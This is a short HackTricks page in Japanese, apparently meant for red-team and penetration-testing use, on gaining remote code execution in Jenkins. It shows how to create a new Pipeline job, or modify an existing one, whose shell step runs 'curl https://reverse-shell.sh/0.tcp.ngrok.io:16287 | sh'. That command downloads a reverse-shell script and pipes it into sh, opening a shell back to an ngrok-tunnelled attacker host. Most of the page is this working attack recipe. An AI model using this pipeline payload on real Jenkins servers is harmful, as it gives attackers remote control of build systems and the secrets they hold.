Jenkins RCE Creating/Modifying Pipeline

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricks をサポートする他の方法:

新しいパイプラインの作成

"New Item"(/view/all/newJobでアクセス可能)で Pipeline を選択します:

Pipelineセクション逆シェル を記述します:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

パイプラインの作成

最後に保存をクリックし、今すぐビルドをクリックすると、パイプラインが実行されます:

パイプラインの変更

あるパイプラインの構成ファイルにアクセスできる場合、逆シェルを追加して変更し、それを実行するか、実行されるのを待つことができます。

最終更新